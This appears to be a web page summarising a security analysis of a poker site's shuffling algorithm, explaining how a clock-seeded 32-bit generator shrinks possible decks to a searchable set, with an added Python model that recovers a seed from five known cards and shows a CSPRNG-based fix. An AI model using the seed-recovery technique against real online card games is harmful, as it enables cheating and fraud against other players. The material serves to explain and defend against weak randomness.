Texas Hold 'Em, card shuffling randomness. We found that the algorithm used by ASF Software, Inc., the company that produces the software used by most of the online poker games, suffered from many flaws.
 
In a real deck of cards, there are 52! (approximately 2^226) possible unique shuffles. When a computer shuffles a virtual deck of cards, it selects one of these possible combinations. There are many algorithms that can be used to shuffle a deck of cards, some of which are better than others (and some of which are just plain wrong).

The shuffling algorithm used in the ASF software always starts with an ordered deck of cards, and then generates a sequence of random numbers used to re-order the deck. Recall that in a real deck of cards, there are 52! (approximately 2^226) possible unique shuffles. Also recall that the seed for a 32-bit random number generator must be a 32-bit number, meaning that there are just over 4 billion possible seeds. Since the deck is reinitialized and the generator re-seeded before each shuffle, only 4 billion possible shuffles can result from this algorithm. Four billion possible shuffles is alarmingly less than 52!.

To make matters worse, the algorithm of Figure 1 chooses the seed for the random number generator using the Pascal function Randomize(). This particular Randomize() function chooses a seed based on the number of milliseconds since midnight. There are a mere 86,400,000 milliseconds in a day. Since this number was being used as the seed for the random number generator, the number of possible decks now reduces to 86,400,000. Eighty-six million is alarmingly less than four billion. But that's not all. It gets worse.

The system clock seed gave us an idea that reduced the number of possible shuffles even further. By synchronizing our program with the system clock on the server generating the pseudo-random number, we are able to reduce the number of possible combinations down to a number on the order of 200,000 possibilities. After that move, the system is ours, since searching through this tiny set of shuffles is trivial and can be done on a PC in real time.

The RST exploit itself requires five cards from the deck to be known. Based on the five known cards, our program searches through the few hundred thousand possible shuffles and deduces which one is a perfect match. In the case of Texas Hold'em poker, this means our program takes as input the two cards that the cheating player is dealt, plus the first three community cards that are dealt face up (the flop). These five cards are known after the first of four rounds of betting and are enough for us to determine (in real time, during play) the exact shuffle. 

- Article
- Another article on it
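The argument above is about the size of the reachable set: a shuffle that starts from an ordered deck and is driven by a PRNG seeded with one integer can produce at most as many decks as there are seeds, and a clock-derived seed shrinks that further to a window a program can search. The following is an added example, not the RST tool the article describes, that models this in Python: it sizes the spaces the article quotes, implements the weak shuffle and its CSPRNG-driven replacement, and shows that five known cards pick out the seed from a window of candidates. The deck, seed window and "true" seed are constructed for the demonstration.

```python
import math
import random
import secrets

# Added example: toy model of the seed-space problem described above.
DECK = [rank + suit for suit in "SHDC" for rank in "23456789TJQKA"]  # 52 cards
MS_PER_DAY = 86_400_000


def seed_space_summary():
    """The sizes the article compares: orderings of 52 cards, a 32-bit seed
    space, and milliseconds since midnight."""
    orderings = math.factorial(52)
    return {
        "orderings": orderings,
        "log2_orderings": math.log2(orderings),     # about 225.6, i.e. ~2^226
        "seeds_32bit": 2 ** 32,
        "seeds_ms_since_midnight": MS_PER_DAY,
    }


def weak_shuffle(seed):
    """Deck starts ordered and is permuted by a PRNG seeded with one integer,
    so the whole deal is a function of the seed."""
    rng = random.Random(seed)
    deck = list(DECK)
    rng.shuffle(deck)
    return deck


def strong_shuffle():
    """Fisher-Yates driven by the OS CSPRNG: there is no seed to recover."""
    deck = list(DECK)
    secrets.SystemRandom().shuffle(deck)
    return deck


def recover_seed(known_cards, seed_window):
    """Search a window of candidate seeds (the article's clock-synchronized
    window) for shuffles whose first cards match the ones already seen."""
    n = len(known_cards)
    return [s for s in seed_window if weak_shuffle(s)[:n] == list(known_cards)]


def demo(true_seed=4321, window=range(0, 5000)):
    """Deal with a seed from inside the window, then identify it from five cards.
    In the model the first five cards stand in for two hole cards plus the flop."""
    dealt = weak_shuffle(true_seed)
    return recover_seed(dealt[:5], window)


if __name__ == "__main__":
    print(seed_space_summary())
    print("candidate seeds:", demo())
```

Five cards carry far more information (52 x 51 x 50 x 49 x 48 possibilities) than a window of a few thousand, or even a few hundred thousand, seeds, which is why the match is unique in practice. The fix is not a bigger seed but removing the seed as the single point of determinism, as `strong_shuffle` does.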

Bridge hand generator RNG

ACBL and USBF hand generators are demonstrably insecure
- Related Issue/Article